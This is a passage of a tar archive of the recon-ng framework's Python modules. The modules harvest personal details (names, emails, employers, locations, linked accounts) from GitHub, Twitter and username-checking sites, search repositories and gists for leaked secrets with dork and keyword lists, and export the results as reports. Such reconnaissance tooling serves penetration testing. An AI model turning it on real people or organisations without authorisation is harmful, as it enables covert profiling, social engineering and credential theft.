gitoJoin]) tdata.append(['Email', gitoEmail]) tdata.append(['Personal URL', gitoPersonalUrl]) for gitoProjUrl, gitoProjName in gitoProjects: tdata.append(['Project', '%s (https://gitorious.org/%s)' % (gitoProjName, gitoProjUrl)]) self.table(tdata, title='Gitorious') # add the pertinent information to the database if not gitoName: gitoName = username fname, mname, lname = self.parse_name(gitoName) self.add_contacts(first_name=fname, middle_name=mname, last_name=lname, title='Gitorious Contributor', email=gitoEmail) else: self.output('Gitorious username not found.') def module_run(self, usernames): for username in usernames: # Check each repository self.github(username) self.bitbucket(username) self.sourceforge(username) self.codeplex(username) self.gitorious(username) ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/profiles-contacts/github_users.py�������������������0000664�0000000�0000000�00000002441�13122657244�0027447�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from urllib import quote_plus class Module(BaseModule): meta = { 'name': 'Github Profile Harvester', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Uses the Github API to gather user info from harvested profiles. Updates the \'contacts\' table with the results.', 'required_keys': ['github_api'], 'query': "SELECT DISTINCT username FROM profiles WHERE username IS NOT NULL AND resource LIKE 'Github'", } def module_run(self, usernames): for username in usernames: users = self.query_github_api(endpoint='/users/%s' % (quote_plus(username))) # should only be one result, but loop just in case for user in users: name = user['name'] fname, mname, lname = self.parse_name(name or '') email = user['email'] title = 'Github Contributor' if user['company']: title += ' at %s' % (user['company']) region = user['location'] # don't add if lacking meaningful data if any((fname, lname, email)): self.add_contacts(first_name=fname, middle_name=mname, last_name=lname, email=email, title=title, region=region) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/profiles-profiles/����������������������������������0000775�0000000�0000000�00000000000�13122657244�0024376�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/profiles-profiles/namechk.py������������������������0000664�0000000�0000000�00000006074�13122657244�0026365�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.mixins.threads import ThreadingMixin from cookielib import CookieJar from lxml.html import fromstring class Module(BaseModule, ThreadingMixin): meta = { 'name': 'NameChk.com Username Validator', 'author': 'Tim Tomes (@LaNMaSteR53) and thrapt (thrapt@gmail.com)', 'description': 'Leverages NameChk.com to validate the existance of usernames on specific web sites and updates the \'profiles\' table with the results.', 'comments': ( 'Note: The global timeout option may need to be increased to support slower sites.', ), 'query': 'SELECT DISTINCT username FROM profiles WHERE username IS NOT NULL', } def module_run(self, usernames): # retrieve list of sites self.verbose('Retrieving site data...') url = 'https://namechk.com/' cookiejar = CookieJar() resp = self.request(url, cookiejar=cookiejar) tree = fromstring(resp.text) # extract sites info from the page names = tree.xpath('//div[@class="media record"]/@data-name') labels = tree.xpath('//div[@class="media record"]//h4[@class="media-heading"]/text()') if not len(names) == len(labels): self.error('Inconsistent number of sites and labels.') return # merge names and labels into a list of tuples sites = zip(names, labels) # extract token from the reponse token = ''.join([x.value for x in resp.cookiejar if x.name=='token']) # reset url for site requests url = 'https://namechk.com/availability/%s' payload = {'x': token} # required header for site requests headers = {'X-Requested-With': 'XMLHttpRequest', 'Accept': 'application/json'} for username in usernames: self.heading(username, level=0) payload['q'] = username # validate memberships self.thread(sites, url, payload, headers, cookiejar) def module_thread(self, site, url, payload, headers, cookiejar): name, label = site fails = 1 retries = 5 while True: # build and send the request resp = self.request(url % (name), headers=headers, payload=payload, cookiejar=cookiejar) # retry a max # of times for server 500 error if 'error' in resp.json: if fails < retries: fails += 1 continue self.error('%s: Unknown error!' % (label)) else: username = resp.json['username'] available = resp.json['available'] #status = resp.json['status'] #reason = resp.json['failed_reason'] profile = resp.json['callback_url'] if not available: # update profiles table self.add_profiles(username=username, resource=label, url=profile, category='social') self.query('DELETE FROM profiles WHERE username = ? and url IS NULL', (username,)) break ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/profiles-profiles/profiler.py�����������������������0000664�0000000�0000000�00000003714�13122657244�0026577�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.mixins.threads import ThreadingMixin import urllib class Module(BaseModule, ThreadingMixin): meta = { 'name': 'OSINT HUMINT Profile Collector', 'author':'Micah Hoffman (@WebBreacher)', 'description': 'Takes each username from the profiles table and searches a variety of web sites for those users. The list of valid sites comes from the parent project at https://github.com/WebBreacher/WhatsMyName', 'comments': ( 'Note: The global timeout option may need to be increased to support slower sites.', 'Warning: Using this module behind a filtering proxy may cause false negatives as some of these sites may be blocked.', ), 'query': 'SELECT DISTINCT username FROM profiles WHERE username IS NOT NULL', } def module_run(self, usernames): # retrieve list of sites url = 'https://raw.githubusercontent.com/WebBreacher/WhatsMyName/master/web_accounts_list.json' self.verbose('Retrieving %s...' % (url)) resp = self.request(url) for user in usernames: self.heading('Looking up data for: %s' % user) self.thread(resp.json['sites'], user) def module_thread(self, site, user): d = dict(site) if d['valid'] == True: self.verbose('Checking: %s' % d['name']) url = d['check_uri'].replace('{account}', urllib.quote(user)) resp = self.request(url, redirect=False) if resp.status_code == int(d['account_existence_code']): self.debug('Codes matched %s %s' % (resp.status_code, d['account_existence_code'])) if d['account_existence_string'] in resp.text or d['account_existence_string'] in resp.headers: self.add_profiles(username=user, url=url, resource=d['name'], category=d['category']) self.query('DELETE FROM profiles WHERE username = ? and url IS NULL', (user,)) ����������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/profiles-profiles/twitter_mentioned.py��������������0000664�0000000�0000000�00000002603�13122657244�0030515�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import re class Module(BaseModule): meta = { 'name': 'Twitter Mentioned', 'author': 'Robert Frost (@frosty_1313, frosty[at]unluckyfrosty.net)', 'description': 'Leverages the Twitter API to enumerate users that mentioned the given handle. Updates the \'profiles\' table with the results.', 'required_keys': ['twitter_api', 'twitter_secret'], 'comments': ( 'Twitter limits searchable tweet history to 7 days.', ), 'query': "SELECT DISTINCT username FROM profiles WHERE username IS NOT NULL AND resource LIKE 'Twitter' COLLATE NOCASE", 'options': ( ('limit', True, True, 'toggle rate limiting'), ), } def module_run(self, handles): for handle in handles: handle = handle if not handle.startswith('@') else handle[1:] self.heading(handle, level=0) for operand in ['to:', '@']: results = self.search_twitter_api({'q':'%s%s' % (operand, handle)}, self.options['limit']) for tweet in results: handle = tweet['user']['screen_name'] name = tweet['user']['name'] time = tweet['created_at'] self.add_profiles(username=handle, resource='Twitter', url='https://twitter.com/' + handle, category='social', notes=name) �����������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/profiles-profiles/twitter_mentions.py���������������0000664�0000000�0000000�00000003027�13122657244�0030370�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import re class Module(BaseModule): meta = { 'name': 'Twitter Mentions', 'author': 'Robert Frost (@frosty_1313, frosty[at]unluckyfrosty.net)', 'description': 'Leverages the Twitter API to enumerate users that were mentioned by the given handle. Updates the \'profiles\' table with the results.', 'required_keys': ['twitter_api', 'twitter_secret'], 'comments': ( 'Twitter limits searchable tweet history to 7 days.', ), 'query': "SELECT DISTINCT username FROM profiles WHERE username IS NOT NULL AND resource LIKE 'Twitter' COLLATE NOCASE", 'options': ( ('limit', True, True, 'toggle rate limiting'), ), } def module_run(self, handles): for handle in handles: handle = handle if not handle.startswith('@') else handle[1:] self.heading(handle, level=0) results = self.search_twitter_api({'q':'from:%s' % (handle)}, self.options['limit']) for tweet in results: if 'entities' in tweet: if 'user_mentions' in tweet['entities']: for mention in tweet['entities']['user_mentions']: handle = mention['screen_name'] name = mention['name'] time = tweet['created_at'] self.add_profiles(username=handle, resource='Twitter', url='https://twitter.com/' + handle, category='social', notes=name) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/profiles-repositories/������������������������������0000775�0000000�0000000�00000000000�13122657244�0025302�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/profiles-repositories/github_repos.py���������������0000664�0000000�0000000�00000003352�13122657244�0030351�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from urllib import quote_plus class Module(BaseModule): meta = { 'name': 'Github Code Enumerator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Uses the Github API to enumerate repositories and gists owned by a Github user. Updates the \'repositories\' table with the results.', 'required_keys': ['github_api'], 'query': "SELECT DISTINCT username FROM profiles WHERE username IS NOT NULL AND resource LIKE 'Github'", } def module_run(self, users): for user in users: self.heading(user, level=0) # enumerate repositories repos = self.query_github_api('/users/%s/repos' % (quote_plus(user))) for repo in repos: data = { 'name': repo['name'], 'owner': repo['owner']['login'], 'description': repo['description'], 'url': repo['html_url'], 'resource': 'Github', 'category': 'repo', } self.add_repositories(**data) # enumerate gists gists = self.query_github_api('/users/%s/gists' % (quote_plus(user))) for gist in gists: files = gist['files'].values() for _file in files: data = { 'name': _file['filename'], 'owner': gist['owner']['login'], 'description': gist['description'], 'url': _file['raw_url'], 'resource': 'Github', 'category': 'gist', } self.add_repositories(**data) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/repositories-profiles/������������������������������0000775�0000000�0000000�00000000000�13122657244�0025302�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/repositories-profiles/github_commits.py�������������0000664�0000000�0000000�00000003605�13122657244�0030675�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from urllib import quote_plus class Module(BaseModule): meta = { 'name': 'Github Commit Searcher', 'author': 'Michael Henriksen (@michenriksen)', 'description': 'Uses the Github API to gather user profiles from repository commits. Updates the \'profiles\' table with the results.', 'required_keys': ['github_api'], 'query': "SELECT DISTINCT owner, name FROM repositories WHERE resource LIKE 'Github' AND category LIKE 'repo'", 'options': ( ('maxpages', 1, True, 'maximum number of commit pages to process for each repository (0 = unlimited)'), ('author', True, True, 'extract author information'), ('committer', True, True, 'extract committer information'), ), } def module_run(self, repos): for repo in repos: commits = self.query_github_api( endpoint='/repos/%s/%s/commits' % (quote_plus(repo[0]), quote_plus(repo[1])), payload={}, options={'max_pages': int(self.options['maxpages']) or None}, ) for commit in commits: for key in ('committer', 'author'): if self.options[key] and key in commit and commit[key]: url = commit[key]['html_url'] login = commit[key]['login'] self.add_profiles(username=login, url=url, resource='Github', category='coding') if self.options[key] and key in commit['commit'] and commit['commit'][key]: name = commit['commit'][key]['name'] email = commit['commit'][key]['email'] fname, mname, lname = self.parse_name(name) self.add_contacts(first_name=fname, middle_name=mname, last_name=lname, email=email, title='Github Contributor') ���������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/repositories-vulnerabilities/�����������������������0000775�0000000�0000000�00000000000�13122657244�0026660�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/repositories-vulnerabilities/gists_search.py��������0000664�0000000�0000000�00000003341�13122657244�0031711�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from urllib import quote_plus import os class Module(BaseModule): meta = { 'name': 'Github Gist Searcher', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Uses the Github API to download and search Gists for possible information disclosures. Updates the \'vulnerabilities\' table with the results.', 'comments': ( 'Gist searches are case sensitive. Include all desired permutations in the keyword list.', ), 'query': "SELECT DISTINCT url FROM repositories WHERE url IS NOT NULL AND resource LIKE 'Github' AND category LIKE 'gist'", 'options': ( ('keywords', os.path.join(BaseModule.data_path, 'gist_keywords.txt'), True, 'file containing a list of keywords'), ), } def module_run(self, gists): with open(self.options['keywords']) as fp: # create list of keywords and filter out comments keywords = [x.strip() for x in fp.read().splitlines() if x and not x.startswith('#')] for gist in gists: filename = gist.split(os.sep)[-1] self.heading(filename, level=0) resp = self.request(gist) for keyword in keywords: self.verbose('Searching Gist for: %s' % (keyword)) lines = resp.raw.splitlines() for lineno, line in enumerate(lines): if keyword in line: data = { 'reference': gist, 'example': 'line %d: %s' % (lineno, line.strip()), 'category': 'Information Disclosure', } self.add_vulnerabilities(**data) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/recon/repositories-vulnerabilities/github_dorks.py��������0000664�0000000�0000000�00000002652�13122657244�0031723�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import os class Module(BaseModule): meta = { 'name': 'Github Dork Analyzer', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Uses the Github API to search for possible vulnerabilites in source code by leveraging Github Dorks and the \'repo\' search operator. Updates the \'vulnerabilities\' table with the results.', 'required_keys': ['github_api'], 'query': "SELECT DISTINCT owner || '/' || name FROM repositories WHERE name IS NOT NULL AND resource LIKE 'Github' AND category LIKE 'repo'", 'options': ( ('dorks', os.path.join(BaseModule.data_path, 'github_dorks.txt'), True, 'file containing a list of Github dorks'), ), } def module_run(self, repos): with open(self.options['dorks']) as fp: # create list of dorks and filter out comments dorks = [x.strip() for x in fp.read().splitlines() if x and not x.startswith('#')] for repo in repos: self.heading(repo, level=0) for dork in dorks: query = 'repo:%s %s' % (repo, dork) for result in self.search_github_api(query): data = { 'reference': query, 'example': result['html_url'], 'category': 'Github Dork', } self.add_vulnerabilities(**data) ��������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/reporting/������������������������������������������������0000775�0000000�0000000�00000000000�13122657244�0021635�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/reporting/csv.py������������������������������������������0000664�0000000�0000000�00000002303�13122657244�0023000�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import csv import os class Module(BaseModule): meta = { 'name': 'CSV File Creator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Creates a CSV file containing the specified harvested data.', 'options': ( ('table', 'hosts', True, 'source table of data to export'), ('filename', os.path.join(BaseModule.workspace, 'results.csv'), True, 'path and filename for output'), ), } def module_run(self): filename = self.options['filename'] # codecs module not used because the csv module converts to ascii with open(filename, 'w') as outfile: # build a list of table names table = self.options['table'] rows = self.query('SELECT * FROM "%s" ORDER BY 1' % (table)) cnt = 0 for row in rows: row = [x if x else '' for x in row] if any(row): cnt += 1 csvwriter = csv.writer(outfile, quoting=csv.QUOTE_ALL) csvwriter.writerow([s.encode("utf-8") for s in row]) self.output('%d records added to \'%s\'.' % (cnt, filename)) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/reporting/html.py�����������������������������������������0000664�0000000�0000000�00000012573�13122657244�0023163�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import codecs import datetime import os class Module(BaseModule): meta = { 'name': 'HTML Report Generator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Creates a HTML report.', 'options': ( ('sanitize', True, True, 'mask sensitive data in the report'), ('customer', None, True, 'customer name for the report header'), ('creator', None, True, 'creator name for the report footer'), ('filename', os.path.join(BaseModule.workspace, 'results.html'), True, 'path and filename for report output'), ), } def build_table(self, table): table_content = '' table_show = '<a id="show-%s" href="javascript:showhide(\'%s\');"><p>[+] %s</p></a>' % (table, table, table.replace('_', ' ').title()) table_hide = '<a id="hide-%s" href="javascript:showhide(\'%s\');"><p>[-] %s</p><hr></a>' % (table, table, table.replace('_', ' ').title()) columns = [x[1] for x in self.query('PRAGMA table_info(\'%s\')' % (table))] row_headers = '<tr><th>%s</th></tr>' % ('</th><th>'.join(columns)) rows = self.query('SELECT "%s" FROM "%s" ORDER BY 1' % ('", "'.join(columns), table)) if not rows: return '' row_content = '' for row in rows: values = [self.to_unicode_str(x) if x != None else u'' for x in row] if table == 'credentials' and values[1] and self.options['sanitize']: values[1] = '<omitted>' row_content += '<tr><td>%s</td></tr>\n' % ('</td><td>'.join([self.html_escape(x) for x in values])) table_content += '<div class="container">\n%s\n%s\n<table name="table" id="%s">\n%s\n%s</table>\n</div><br />\n' % (table_show, table_hide, table, row_headers, row_content) return table_content def module_run(self): filename = self.options['filename'] with codecs.open(filename, 'wb', encoding='utf-8') as outfile: table_content = '' # html template template = open(os.path.join(self.data_path, 'template_html.html')).read() # custom summary results table table_show = '<a id="show-summary" href="javascript:showhide(\'summary\');"><p>[+] Summary</p></a>' table_hide = '<a id="hide-summary" href="javascript:showhide(\'summary\');"><p>[-] Summary</p><hr></a>' tables = self.get_tables() row_headers = '<tr><th>table</th><th>count</th></tr>' row_content = '' for table in tables: query = 'SELECT COUNT(*) FROM "%s"' % (table) if table == 'leaks': query = 'SELECT COUNT(DISTINCT leak) FROM credentials WHERE leak IS NOT NULL' count = self.query(query)[0][0] row_content += '<tr><td>%s</td><td class="centered">%s</td></tr>\n' % (table, count) table_content += '<div class="container">\n%s\n%s\n<table id="summary">\n%s\n%s</table>\n</div><br />\n' % (table_show, table_hide, row_headers, row_content) # main content tables tables = ['domains', 'companies', 'netblocks', 'locations', 'hosts', 'contacts', 'credentials'] for table in tables: table_content += self.build_table(table) # table of leaks associated with credentials leaks = self.query('SELECT DISTINCT leak FROM credentials WHERE leak IS NOT NULL') if leaks: if self.query('SELECT COUNT(*) FROM leaks')[0][0]: columns = [x[1] for x in self.query('PRAGMA table_info(leaks)')] table_content += '<div class="container">\n' table_content += '<a id="show-leaks" href="javascript:showhide(\'leaks\');"><p>[+] Associated Leaks</p></a>\n' table_content += '<a id="hide-leaks" href="javascript:showhide(\'leaks\');"><p>[-] Associated Leaks</p></a>\n' table_content += '<div name="table" id="leaks">\n' for leak in [x[0] for x in leaks]: row_content = '' row = self.query('SELECT * FROM leaks WHERE leak_id=?', (leak,))[0] values = [self.html_escape(x) if x != None else '' for x in row] for i in range(0,len(columns)): row_content += '<tr><td><strong>%s</strong></td><td>%s</td></tr>\n' % (columns[i], values[i]) table_content += '<hr>\n<table class="leak">\n%s</table>\n' % (row_content) table_content += '</div>\n</div><br />' else: self.output('Associated leak data omitted. Please run the \'leaks_dump\' module to populate the database and try again.') # all other tables # build exclusions list by extending the list from above tables.extend(['leaks', 'pushpins', 'dashboard']) tables = [x for x in self.get_tables() if x not in tables] for table in tables: table_content += self.build_table(table) title = self.options['customer'] creator = self.options['creator'] created = datetime.datetime.now().strftime('%a, %b %d %Y %H:%M:%S') markup = template % (title, table_content, creator, created) outfile.write(markup) self.output('Report generated at \'%s\'.' % (filename)) �������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/reporting/json.py�����������������������������������������0000664�0000000�0000000�00000002740�13122657244�0023163�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import codecs import json import os class Module(BaseModule): meta = { 'name': 'JSON Report Generator', 'author': 'Paul (@PaulWebSec)', 'version': 'v0.0.1', 'description': 'Creates a JSON report.', 'options': ( ('tables', 'hosts, contacts, credentials', True, 'comma delineated list of tables'), ('filename', os.path.join(BaseModule.workspace, 'results.json'), True, 'path and filename for report output'), ), } def module_run(self): filename = self.options['filename'] with codecs.open(filename, 'wb', encoding='utf-8') as outfile: # build a list of table names tables = [x.strip() for x in self.options['tables'].split(',')] data_dict = {} cnt = 0 for table in tables: data_dict[table] = [] columns = [x[0] for x in self.get_columns(table)] rows = self.query('SELECT "%s" FROM "%s" ORDER BY 1' % ('", "'.join(columns), table)) for row in rows: row_dict = {} for i in range(0,len(columns)): row_dict[columns[i]] = row[i] data_dict[table].append(row_dict) cnt += 1 # write the JSON to a file outfile.write(json.dumps(data_dict, indent=4)) self.output('%d records added to \'%s\'.' % (cnt, filename)) ��������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/reporting/list.py�����������������������������������������0000664�0000000�0000000�00000003041�13122657244�0023160�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import codecs import os class Module(BaseModule): meta = { 'name': 'List Creator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Creates a file containing a list of records from the database.', 'options': ( ('table', 'hosts', True, 'source table of data for the list'), ('column', 'ip_address', True, 'source column of data for the list'), ('unique', True, True, 'only return unique items from the dataset'), ('nulls', False, True, 'include nulls in the dataset'), ('filename', os.path.join(BaseModule.workspace, 'list.txt'), True, 'path and filename for output'), ), } def module_run(self): filename = self.options['filename'] with codecs.open(filename, 'wb', encoding='utf-8') as outfile: # handle the source of information for the report column = self.options['column'] table = self.options['table'] nulls = ' WHERE "%s" IS NOT NULL' % (column) if not self.options['nulls'] else '' unique = 'DISTINCT ' if self.options['unique'] else '' values = (unique, column, table, nulls) query = 'SELECT %s"%s" FROM "%s"%s ORDER BY 1' % values rows = self.query(query) for row in [x[0] for x in rows]: row = row if row else '' outfile.write('%s\n' % (row)) print(row) self.output('%d items added to \'%s\'.' % (len(rows), filename)) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/reporting/proxifier.py������������������������������������0000664�0000000�0000000�00000001424�13122657244�0024217�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from recon.mixins.threads import ThreadingMixin class Module(BaseModule, ThreadingMixin): meta = { 'name': 'Proxifier', 'author': 'AverageSecurityGuy (@averagesecguy)', 'description': 'Requests URLs from the database for the purpose of populating an inline proxy. Requires that the global proxy option be set prior to running the module.', 'query': 'SELECT example FROM vulnerabilities WHERE category=\'Google Dork\'', } def module_run(self, urls): self.thread(urls) def module_thread(self, url): try: resp = self.request(url) self.verbose('%s => %d' % (url, resp.status_code)) except Exception as e: self.error('%s => %s' % (url, e)) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/reporting/pushpin.py��������������������������������������0000664�0000000�0000000�00000011527�13122657244�0023703�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import codecs import os import re import time import webbrowser class Module(BaseModule): meta = { 'name': 'PushPin Report Generator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Creates HTML media and map reports for all of the PushPins stored in the database.', 'options': ( ('latitude', None, True, 'latitude of the epicenter'), ('longitude', None, True, 'longitude of the epicenter'), ('radius', None, True, 'radius from the epicenter in kilometers'), ('map_filename', os.path.join(BaseModule.workspace, 'pushpin_map.html'), True, 'path and filename for pushpin map report'), ('media_filename', os.path.join(BaseModule.workspace, 'pushpin_media.html'), True, 'path and filename for pushpin media report'), ), } def remove_nl(self, x, repl=''): return re.sub('[\r\n]+', repl, self.html_escape(x)) def build_content(self, sources): icons = { 'flickr': 'http://maps.google.com/mapfiles/ms/icons/orange-dot.png', 'instagram': 'http://maps.google.com/mapfiles/ms/icons/pink-dot.png', 'picasa': 'http://maps.google.com/mapfiles/ms/icons/purple-dot.png', 'shodan': 'http://maps.google.com/mapfiles/ms/icons/yellow-dot.png', 'twitter': 'http://maps.google.com/mapfiles/ms/icons/blue-dot.png', 'youtube': 'http://maps.google.com/mapfiles/ms/icons/red-dot.png', } media_content = '' map_content = '' map_arrays = '' map_checkboxes = '' for source in sources: count = source[0] source = source[1] map_arrays += 'var %s = [];\n' % (source.lower()) map_checkboxes += '<input type="checkbox" id="%s" onchange="toggleMarkers(\'%s\');" checked="checked"/>%s<br />\n' % (source.lower(), source.lower(), source) media_content += '<div class="media_column %s">\n<div class="media_header"><div class="media_summary">%s</div>%s</div>\n' % (source.lower(), count, source.capitalize()) items = self.query('SELECT * FROM pushpins WHERE source=?', (source,)) items.sort(key=lambda x: x[9], reverse=True) for item in items: item = [self.to_unicode_str(x) if x != None else u'' for x in item] media_content += '<div class="media_row"><div class="prof_cell"><a href="%s" target="_blank"><img class="prof_img rounded" src="%s" /></a></div><div class="data_cell"><div class="trigger" id="trigger" lat="%s" lon="%s">[<a href="%s" target="_blank">%s</a>] %s<br /><span class="time">%s</span></div></div></div>\n' % (item[4], item[5], item[7], item[8], item[3], item[2], self.remove_nl(item[6], '<br />'), item[9]) map_details = "<table><tr><td class='prof_cell'><a href='%s' target='_blank'><img class='prof_img rounded' src='%s' /></a></td><td class='data_cell'>[<a href='%s' target='_blank'>%s</a>] %s<br /><span class='time'>%s</span></td></tr></table>" % (item[4], item[5], item[3], self.remove_nl(item[2]), self.remove_nl(item[6], '<br />'), item[9]) map_content += 'add_marker({position: new google.maps.LatLng(%s,%s),title:"%s",icon:"%s",map:map},{details:"%s"}, "%s");\n' % (item[7], item[8], self.remove_nl(item[2]), icons[source.lower()], map_details, source.lower()) media_content += '</div>\n' return (media_content,), (map_content, map_arrays, map_checkboxes) def write_markup(self, template, filename, content): temp_content = open(template).read() page = temp_content % content with codecs.open(filename, 'wb', 'utf-8') as fp: fp.write(page) def module_run(self): sources = self.query('SELECT COUNT(source), source FROM pushpins GROUP BY source') media_content, map_content = self.build_content(sources) meta_content = (self.options['latitude'], self.options['longitude'], self.options['radius']) # create the media report media_content = meta_content + media_content media_filename = self.options['media_filename'] self.write_markup(os.path.join(self.data_path, 'template_media.html'), media_filename, media_content) self.output('Media data written to \'%s\'' % (media_filename)) # order the map_content tuple map_content = meta_content + map_content order=[4,0,1,2,3,5] map_content = tuple([map_content[i] for i in order]) # create the map report map_filename = self.options['map_filename'] self.write_markup(os.path.join(self.data_path, 'template_map.html'), map_filename, map_content) self.output('Mapping data written to \'%s\'' % (map_filename)) # open the reports in a browser w = webbrowser.get() w.open(media_filename) time.sleep(2) w.open(map_filename) �������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/reporting/xlsx.py�����������������������������������������0000664�0000000�0000000�00000002457�13122657244�0023215�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule import os import xlsxwriter class Module(BaseModule): meta = { 'name': 'XLSX File Creator', 'author': 'Tim Tomes (@LaNMaSteR53)', 'description': 'Creates an Excel compatible XLSX file containing the entire data set.', 'options': ( ('filename', os.path.join(BaseModule.workspace, 'results.xlsx'), True, 'path and filename for output'), ), } def module_run(self): filename = self.options['filename'] # create an new xlsx file with xlsxwriter.Workbook(filename, {'strings_to_urls': False}) as workbook: tables = self.get_tables() # loop through all tables in the database for table in tables: # create a worksheet for the table worksheet = workbook.add_worksheet(table) # build the data set rows = [tuple([x[0] for x in self.get_columns(table)])] rows.extend(self.query('SELECT * FROM "%s"' % (table))) # write the rows of data to the xlsx file for r in range(0, len(rows)): for c in range(0, len(rows[r])): worksheet.write(r, c, rows[r][c]) self.output('All data written to \'%s\'.' % (filename)) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������LaNMaSteR53-recon-ng-70d967e3f530/modules/reporting/xml.py������������������������������������������0000664�0000000�0000000�00000003167�13122657244�0023016�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from recon.core.module import BaseModule from dicttoxml import dicttoxml from xml.dom.minidom import parseString import codecs import os class Module(BaseModule): meta = { 'name': 'XML Report Generator', 'author': 'Eric Humphries 